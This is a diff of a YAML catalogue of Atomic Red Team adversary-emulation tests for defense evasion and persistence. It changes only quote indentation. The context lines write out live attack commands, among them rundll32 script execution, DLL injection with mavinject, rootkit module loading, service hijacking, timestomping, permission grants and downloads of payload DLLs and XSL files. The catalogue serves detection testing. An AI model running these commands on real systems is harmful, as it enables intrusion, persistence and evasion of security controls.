@@ -32723,7 +32723,7 @@ defense-evasion:
           Stop-Process -ID $myT1036_003
         cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore
 
-          '
+'
         name: powershell
     - name: Malicious process Masquerading as LSM.exe
       auto_generated_guid: 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f
@@ -33005,7 +33005,7 @@ defense-evasion:
       - description: 'Mimikatz executor must exist on disk and at specified location
           (#{mimikatz_path})
 
-          '
+'
         prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
           if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
@@ -33018,10 +33018,10 @@ defense-evasion:
       - description: 'PsExec tool from Sysinternals must exist on disk at specified
           location (#{psexec_path})
 
-          '
+'
         prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
 
-          '
+'
         get_prereq_command: |
           Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
           Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
@@ -33130,7 +33130,7 @@ defense-evasion:
       auto_generated_guid: dfb50072-e45a-4c75-a17e-a484809c8553
       description: 'Loadable Kernel Module based Rootkit
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -33155,10 +33155,10 @@ defense-evasion:
       dependencies:
       - description: 'The kernel module must exist on disk at specified location (#{rootkit_path})
 
-          '
+'
         prereq_command: 'if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi;
 
-          '
+'
         get_prereq_command: |
           if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;
           cp #{rootkit_source_path}/* #{temp_folder}/
@@ -33168,17 +33168,17 @@ defense-evasion:
       executor:
         command: 'sudo insmod #{rootkit_path}
 
-          '
+'
         cleanup_command: 'sudo rmmod #{rootkit_name}
 
-          '
+'
         name: sh
         elevation_required: true
     - name: Loadable Kernel Module based Rootkit
       auto_generated_guid: 75483ef8-f10f-444a-bf02-62eb0e48db6f
       description: 'Loadable Kernel Module based Rootkit
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -33203,11 +33203,11 @@ defense-evasion:
       dependencies:
       - description: 'The kernel module must exist on disk at specified location (#{rootkit_path})
 
-          '
+'
         prereq_command: 'if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then
           exit 0; else exit 1; fi;
 
-          '
+'
         get_prereq_command: "if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder};
           touch #{temp_folder}/safe_to_delete; fi;\ncp #{rootkit_source_path}/* #{temp_folder}/\ncd
           #{temp_folder}; make        \nsudo cp #{temp_folder}/#{rootkit_name}.ko
@@ -33216,7 +33216,7 @@ defense-evasion:
       executor:
         command: 'sudo modprobe #{rootkit_name}
 
-          '
+'
         cleanup_command: |
           sudo modprobe -r #{rootkit_name}
           sudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko
@@ -33247,15 +33247,15 @@ defense-evasion:
       dependencies:
       - description: 'puppetstrings.exe must exist on disk at specified location (#{puppetstrings_path})
 
-          '
+'
         prereq_command: 'if (Test-Path #{puppetstrings_path}) {exit 0} else {exit
           1}
 
-          '
+'
         get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1014/bin/puppetstrings.exe"
           -OutFile "#{puppetstrings_path}"
 
-          '
+'
       executor:
         name: command_prompt
         command: "#{puppetstrings_path} #{driver_path}\n"
@@ -33383,7 +33383,7 @@ defense-evasion:
       description: 'Test execution of a remote script using rundll32.exe. Upon execution
         notepad.exe will be opened.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -33394,7 +33394,7 @@ defense-evasion:
       executor:
         command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
 
-          '
+'
         name: command_prompt
     - name: Rundll32 execute VBscript command
       auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb
@@ -33412,7 +33412,7 @@ defense-evasion:
       executor:
         command: 'rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
 
-          '
+'
         name: command_prompt
     - name: Rundll32 advpack.dll Execution
       auto_generated_guid: d91cae26-7fc1-457b-a854-34c8aad48c89
@@ -33431,17 +33431,17 @@ defense-evasion:
       dependencies:
       - description: 'Inf file must exist on disk at specified location (#{inf_to_execute})
 
-          '
+'
         prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}"
       executor:
         command: 'rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
 
-          '
+'
         name: command_prompt
     - name: Rundll32 ieadvpack.dll Execution
       auto_generated_guid: 5e46a58e-cbf6-45ef-a289-ed7754603df9
@@ -33461,17 +33461,17 @@ defense-evasion:
       dependencies:
       - description: 'Inf file must exist on disk at specified location (#{inf_to_execute})
 
-          '
+'
         prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}"
       executor:
         command: 'rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
 
-          '
+'
         name: command_prompt
     - name: Rundll32 syssetup.dll Execution
       auto_generated_guid: 41fa324a-3946-401e-bbdd-d7991c628125
@@ -33490,10 +33490,10 @@ defense-evasion:
       dependencies:
       - description: 'Inf file must exist on disk at specified location (#{inf_to_execute})
 
-          '
+'
         prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}"
@@ -33501,7 +33501,7 @@ defense-evasion:
         command: 'rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall
           128 .\#{inf_to_execute}
 
-          '
+'
         name: command_prompt
     - name: Rundll32 setupapi.dll Execution
       auto_generated_guid: 71d771cd-d6b3-4f34-bc76-a63d47a10b19
@@ -33520,10 +33520,10 @@ defense-evasion:
       dependencies:
       - description: 'Inf file must exist on disk at specified location (#{inf_to_execute})
 
-          '
+'
         prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}"
@@ -33531,7 +33531,7 @@ defense-evasion:
         command: 'rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128
           .\#{inf_to_execute}
 
-          '
+'
         name: command_prompt
     - name: Execution of HTA and VBS Files using Rundll32 and URL.dll
       auto_generated_guid: 22cfde89-befe-4e15-9753-47306b37a6e3
@@ -33554,7 +33554,7 @@ defense-evasion:
       description: 'Executes the LaunchApplication function in pcwutl.dll to proxy
         execution of an executable.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -33565,7 +33565,7 @@ defense-evasion:
       executor:
         command: 'rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch}
 
-          '
+'
         name: command_prompt
   T1134.005:
     technique:
@@ -33964,7 +33964,7 @@ defense-evasion:
       description: 'Change Service registry ImagePath of a bengin service to a malicious
         file
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -33984,22 +33984,22 @@ defense-evasion:
       dependencies:
       - description: 'The service must exist (#{weak_service_name})
 
-          '
+'
         prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit
           1}
 
-          '
+'
         get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}"
 
-          '
+'
       executor:
         command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}"
           /f /v ImagePath /d "#{malicious_service_path}"
 
-          '
+'
         cleanup_command: 'sc.exe delete #{weak_service_name}
 
-          '
+'
         name: command_prompt
   T1548.001:
     technique:
@@ -34055,7 +34055,7 @@ defense-evasion:
       description: 'Make, change owner, and change file attributes on a C source code
         file
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -34081,7 +34081,7 @@ defense-evasion:
       auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79
       description: 'This test sets the SetUID flag on a file in Linux and macOS.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -34097,14 +34097,14 @@ defense-evasion:
           sudo chmod u+s #{file_to_setuid}
         cleanup_command: 'sudo rm #{file_to_setuid}
 
-          '
+'
         name: sh
         elevation_required: true
     - name: Set a SetGID flag on file
       auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c
       description: 'This test sets the SetGID flag on a file in Linux and macOS.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -34120,7 +34120,7 @@ defense-evasion:
           sudo chmod g+s #{file_to_setuid}
         cleanup_command: 'sudo rm #{file_to_setuid}
 
-          '
+'
         name: sh
         elevation_required: true
   T1218:
@@ -34179,7 +34179,7 @@ defense-evasion:
       description: 'Injects arbitrary DLL into running process specified by process
         ID. Requires Windows 10.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -34195,17 +34195,17 @@ defense-evasion:
       dependencies:
       - description: 'T1218.dll must exist on disk at specified location (#{dll_payload})
 
-          '
+'
         prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}"
       executor:
         command: 'mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: SyncAppvPublishingServer - Execute arbitrary PowerShell code
@@ -34213,7 +34213,7 @@ defense-evasion:
       description: 'Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.
         Requires Windows 10.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -34224,14 +34224,14 @@ defense-evasion:
       executor:
         command: 'SyncAppvPublishingServer.exe "n; #{powershell_code}"
 
-          '
+'
         name: command_prompt
     - name: Register-CimProvider - Execute evil dll
       auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655
       description: 'Execute arbitrary dll. Requires at least Windows 8/2012. Also
         note this dll can be served up via SMB
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -34243,17 +34243,17 @@ defense-evasion:
       dependencies:
       - description: 'T1218-2.dll must exist on disk at specified location (#{dll_payload})
 
-          '
+'
         prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"
       executor:
         command: 'C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
 
-          '
+'
         name: command_prompt
     - name: InfDefaultInstall.exe .inf Execution
       auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef
@@ -34272,17 +34272,17 @@ defense-evasion:
       dependencies:
       - description: 'INF file must exist on disk at specified location (#{inf_to_execute})
 
-          '
+'
         prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}"
       executor:
         command: 'InfDefaultInstall.exe #{inf_to_execute}
 
-          '
+'
         name: command_prompt
     - name: ProtocolHandler.exe Downloaded a Suspicious File
       auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2
@@ -34290,7 +34290,7 @@ defense-evasion:
         Office.  On successful execution you should see Microsoft Word launch a blank
         file.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -34303,15 +34303,15 @@ defense-evasion:
       - description: 'Microsoft Word must be installed with the correct path and protocolhandler.exe
           must be provided
 
-          '
+'
         prereq_command: 'if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft
           Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'write-host "Install Microsoft Word or provide correct
           path."
 
-          '
+'
       executor:
         name: command_prompt
         elevation_required: false
@@ -34323,7 +34323,7 @@ defense-evasion:
       description: 'Emulates attack with Microsoft.Workflow.Compiler.exe running a
         .Net assembly that launches calc.exe
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -34345,15 +34345,15 @@ defense-evasion:
         prereq_command: 'if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit
           1}
 
-          '
+'
         get_prereq_command: 'write-host ".Net must be installed for this test to work
           correctly."
 
-          '
+'
       executor:
         command: '#{mwcpath}\#{mwcname} "#{xml_payload}" output.txt
 
-          '
+'
         name: powershell
         elevation_required: false
     - name: Renamed Microsoft.Workflow.Compiler.exe Payload Executions
@@ -34361,7 +34361,7 @@ defense-evasion:
       description: 'Emulates attack with a renamed Microsoft.Workflow.Compiler.exe
         running a .Net assembly that launches calc.exe
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -34390,7 +34390,7 @@ defense-evasion:
         get_prereq_command: 'write-host "you need to rename workflow complier before
           you run this test"
 
-          '
+'
       executor:
         command: "#{renamed_binary} #{xml_payload} output.txt\n"
         name: powershell
@@ -34433,7 +34433,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-          '
+'
       executor:
         command: 'Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name}
           -ModulePath #{module_path}'
@@ -34500,14 +34500,14 @@ defense-evasion:
       executor:
         command: 'C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
 
-          '
+'
         name: command_prompt
     - name: manage-bde.wsf Signed Script Command Execution
       auto_generated_guid: 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a
       description: 'Executes the signed manage-bde.wsf script with options to execute
         an arbitrary command.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -34521,7 +34521,7 @@ defense-evasion:
           cscript %windir%\System32\manage-bde.wsf
         cleanup_command: 'set comspec=%windir%\System32\cmd.exe
 
-          '
+'
         name: command_prompt
   T1027.002:
     technique:
@@ -34597,10 +34597,10 @@ defense-evasion:
       executor:
         command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
 
-          '
+'
         cleanup_command: 'rm /tmp/packed_bin
 
-          '
+'
         name: sh
     - name: Binary packed by UPX, with modified headers (linux)
       auto_generated_guid: f06197f8-ff46-48c2-a0c6-afc1b50665e1
@@ -34619,10 +34619,10 @@ defense-evasion:
       executor:
         command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
 
-          '
+'
         cleanup_command: 'rm /tmp/packed_bin
 
-          '
+'
         name: sh
     - name: Binary simply packed by UPX
       auto_generated_guid: b16ef901-00bb-4dda-b4fc-a04db5067e20
@@ -34639,10 +34639,10 @@ defense-evasion:
       executor:
         command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
 
-          '
+'
         cleanup_command: 'rm /tmp/packed_bin
 
-          '
+'
         name: sh
     - name: Binary packed by UPX, with modified headers
       auto_generated_guid: 4d46e16b-5765-4046-9f25-a600d3e65e4d
@@ -34661,10 +34661,10 @@ defense-evasion:
       executor:
         command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
 
-          '
+'
         cleanup_command: 'rm /tmp/packed_bin
 
-          '
+'
         name: sh
   T1036.006:
     technique:
@@ -34718,7 +34718,7 @@ defense-evasion:
       auto_generated_guid: 89a7dd26-e510-4c9f-9b15-f3bae333360f
       description: 'Space After Filename
 
-        '
+'
       supported_platforms:
       - macos
       executor:
@@ -34934,7 +34934,7 @@ defense-evasion:
       auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e
       description: 'Common Sudo enumeration methods.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -34948,7 +34948,7 @@ defense-evasion:
         This is dangerous to modify without using ''visudo'', do not do this on a
         production system.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -34963,7 +34963,7 @@ defense-evasion:
       description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
         to modify without using ''visudo'', do not do this on a production system.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -35073,7 +35073,7 @@ defense-evasion:
           | grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization
           Environment detected"; fi;
 
-          '
+'
     - name: Detect Virtualization Environment (Windows)
       auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d
       description: 'Windows Management Instrumentation(WMI) objects contains system
@@ -35083,7 +35083,7 @@ defense-evasion:
         This is meant to find the result of Not supported, which is the result if
         run in a virtual machine
 
-        '
+'
       supported_platforms:
       - windows
       executor:
@@ -35100,7 +35100,7 @@ defense-evasion:
         the system. If it''s a virtual machine, one of the device manufacturer will
         be a Virtualization Software.
 
-        '
+'
       supported_platforms:
       - macos
       executor:
@@ -35110,7 +35110,7 @@ defense-evasion:
           ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment
           detected''; fi;
 
-          '
+'
   T1542.001:
     technique:
       id: attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada
@@ -35350,7 +35350,7 @@ defense-evasion:
       executor:
         command: 'start #{docx_file}
 
-          '
+'
         name: command_prompt
   T1055.003:
     technique:
@@ -35593,7 +35593,7 @@ defense-evasion:
       auto_generated_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810
       description: 'Stomps on the access timestamp of a file
 
-        '
+'
       supported_platforms:
       - linux
       - macos
@@ -35605,13 +35605,13 @@ defense-evasion:
       executor:
         command: 'touch -a -t 197001010000.00 #{target_filename}
 
-          '
+'
         name: sh
     - name: Set a file's modification timestamp
       auto_generated_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52
       description: 'Stomps on the modification timestamp of a file
 
-        '
+'
       supported_platforms:
       - linux
       - macos
@@ -35623,7 +35623,7 @@ defense-evasion:
       executor:
         command: 'touch -m -t 197001010000.00 #{target_filename}
 
-          '
+'
         name: sh
     - name: Set a file's creation timestamp
       auto_generated_guid: 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b
@@ -35669,7 +35669,7 @@ defense-evasion:
       executor:
         command: 'touch -acmr #{reference_file_path} #{target_file_path}
 
-          '
+'
         name: sh
     - name: Windows - Modify file creation timestamp with PowerShell
       auto_generated_guid: b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c
@@ -35692,10 +35692,10 @@ defense-evasion:
       - description: 'A file must exist at the path (#{file_path}) to change the creation
           time on
 
-          '
+'
         prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Path #{file_path} -Force | Out-Null
           Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
@@ -35703,10 +35703,10 @@ defense-evasion:
         command: 'Get-ChildItem #{file_path} | % { $_.CreationTime = "#{target_date_time}"
           }
 
-          '
+'
         cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore
 
-          '
+'
         name: powershell
     - name: Windows - Modify file last modified timestamp with PowerShell
       auto_generated_guid: f8f6634d-93e1-4238-8510-f8a90a20dcf2
@@ -35729,10 +35729,10 @@ defense-evasion:
       - description: 'A file must exist at the path (#{file_path}) to change the modified
           time on
 
-          '
+'
         prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Path #{file_path} -Force | Out-Null
           Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
@@ -35740,10 +35740,10 @@ defense-evasion:
         command: 'Get-ChildItem #{file_path} | % { $_.LastWriteTime = "#{target_date_time}"
           }
 
-          '
+'
         cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore
 
-          '
+'
         name: powershell
     - name: Windows - Modify file last access timestamp with PowerShell
       auto_generated_guid: da627f63-b9bd-4431-b6f8-c5b44d061a62
@@ -35766,10 +35766,10 @@ defense-evasion:
       - description: 'A file must exist at the path (#{file_path}) to change the last
           access time on
 
-          '
+'
         prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Path #{file_path} -Force | Out-Null
           Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
@@ -35777,10 +35777,10 @@ defense-evasion:
         command: 'Get-ChildItem #{file_path} | % { $_.LastAccessTime = "#{target_date_time}"
           }
 
-          '
+'
         cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore
 
-          '
+'
         name: powershell
     - name: Windows - Timestomp a File
       auto_generated_guid: d7512c33-3a75-4806-9893-69abc3ccdd43
@@ -35798,25 +35798,25 @@ defense-evasion:
       dependencies:
       - description: 'timestomp.ps1 must be present in #{file_path}.
 
-          '
+'
         prereq_command: 'if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit
           1}
 
-          '
+'
         get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1"
           -OutFile "#{file_path}\timestomp.ps1"
 
-          '
+'
       - description: 'kxwn.lock must be present in #{file_path}.
 
-          '
+'
         prereq_command: 'if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else
           {exit 1}
 
-          '
+'
         get_prereq_command: 'New-Item -Path #{file_path}\kxwn.lock -ItemType File
 
-          '
+'
       executor:
         command: |
           import-module #{file_path}\timestomp.ps1
@@ -36790,10 +36790,10 @@ defense-evasion:
       - description: 'Test requrires a file to take ownership of to be located at
           (#{file_folder_to_own})
 
-          '
+'
         prereq_command: 'IF EXIST #{file_folder_to_own} ( EXIT 0 ) ELSE ( EXIT 1 )
 
-          '
+'
         get_prereq_command: |
           mkdir #{file_folder_to_own}
           echo T1222.001_takeown1 >> #{file_folder_to_own}\T1222.001_takeown1.txt
@@ -36801,7 +36801,7 @@ defense-evasion:
       executor:
         command: 'takeown.exe /f #{file_folder_to_own} /r
 
-          '
+'
         name: command_prompt
     - name: cacls - Grant permission to specified user or group recursively
       auto_generated_guid: a8206bcc-f282-40a9-a389-05d9c0263485
@@ -36824,10 +36824,10 @@ defense-evasion:
       dependencies:
       - description: 'Test requrires a file to modify to be located at (#{file_or_folder})
 
-          '
+'
         prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 )
 
-          '
+'
         get_prereq_command: |
           mkdir #{file_or_folder}
           echo T1222.001_cacls1 >> #{file_or_folder}\T1222.001_cacls1.txt
@@ -36835,7 +36835,7 @@ defense-evasion:
       executor:
         command: 'icacls.exe #{file_or_folder} /grant #{user_or_group}:F
 
-          '
+'
         name: command_prompt
     - name: attrib - Remove read-only attribute
       auto_generated_guid: bec1e95c-83aa-492e-ab77-60c71bbd21b0
@@ -36853,10 +36853,10 @@ defense-evasion:
       dependencies:
       - description: 'Test requrires a file to modify to be located at (#{file_or_folder})
 
-          '
+'
         prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 )
 
-          '
+'
         get_prereq_command: |
           mkdir #{file_or_folder}
           echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt
@@ -36866,7 +36866,7 @@ defense-evasion:
       executor:
         command: 'attrib.exe -r #{file_or_folder}\*.* /s
 
-          '
+'
         name: command_prompt
     - name: attrib - hide file
       auto_generated_guid: 32b979da-7b68-42c9-9a99-0e39900fc36c
@@ -36884,10 +36884,10 @@ defense-evasion:
       dependencies:
       - description: 'Test requires a file to modify to be located at (#{file_or_folder})
 
-          '
+'
         prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 )
 
-          '
+'
         get_prereq_command: |
           mkdir #{file_or_folder}
           echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt
@@ -36925,18 +36925,18 @@ defense-evasion:
       - description: 'Backup of original folder permissions should exist (for use
           in cleanup commands)
 
-          '
+'
         prereq_command: 'IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 )
 
-          '
+'
         get_prereq_command: 'icacls #{path} /save #{file_path} /t /q >nul 2>&1
 
-          '
+'
       executor:
         command: icacls "#{path}" /grant Everyone:F /T /C /Q
         cleanup_command: 'icacls ''#{path}'' /restore #{file_path} /q >nul 2>&1
 
-          '
+'
         name: command_prompt
         elevation_required: true
   T1220:
@@ -37032,7 +37032,7 @@ defense-evasion:
         at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe
         when test sucessfully executed, while AV turned off.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -37048,26 +37048,26 @@ defense-evasion:
       dependencies:
       - description: 'XML file must exist on disk at specified location (#{xmlfile})
 
-          '
+'
         prereq_command: 'if (Test-Path #{xmlfile}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml" -OutFile "#{xmlfile}"
       - description: 'XSL file must exist on disk at specified location (#{xslfile})
 
-          '
+'
         prereq_command: 'if (Test-Path #{xslfile}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{xslfile}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl" -OutFile "#{xslfile}"
       executor:
         command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
 
-          '
+'
         name: command_prompt
     - name: MSXSL Bypass using remote files
       auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985
@@ -37076,7 +37076,7 @@ defense-evasion:
         at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe
         when test sucessfully executed, while AV turned off.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -37091,14 +37091,14 @@ defense-evasion:
       executor:
         command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
 
-          '
+'
         name: command_prompt
     - name: WMIC bypass using local XSL file
       auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988
       description: 'Executes the code specified within a XSL script using a local
         payload.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -37114,17 +37114,17 @@ defense-evasion:
       dependencies:
       - description: 'XSL file must exist on disk at specified location (#{local_xsl_file})
 
-          '
+'
         prereq_command: 'if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}"
       executor:
         command: 'wmic #{wmic_command} /FORMAT:"#{local_xsl_file}"
 
-          '
+'
         name: command_prompt
     - name: WMIC bypass using remote XSL file
       auto_generated_guid: 7f5be499-33be-4129-a560-66021f379b9b
@@ -37132,7 +37132,7 @@ defense-evasion:
         payload. Open Calculator.exe when test sucessfully executed, while AV turned
         off.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -37147,7 +37147,7 @@ defense-evasion:
       executor:
         command: 'wmic #{wmic_command} /FORMAT:"#{remote_xsl_file}"
 
-          '
+'
         name: command_prompt
 persistence:
   T1546.008:
@@ -37241,7 +37241,7 @@ persistence:
           description: 'Comma separated list of system binaries to which you want
             to attach each #{attached_process}. Default: "osk.exe"
 
-            '
+'
           type: String
           default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe,
             atbroker.exe
@@ -37249,7 +37249,7 @@ persistence:
           description: 'Full path to process to attach to target in #{parent_list}.
             Default: cmd.exe
 
-            '
+'
           type: Path
           default: C:\windows\system32\cmd.exe
       executor:
@@ -37283,7 +37283,7 @@ persistence:
       auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3
       description: 'Replace sticky keys binary (sethc.exe) with cmd.exe
 
-        '
+'
       supported_platforms:
       - windows
       executor:
@@ -37294,7 +37294,7 @@ persistence:
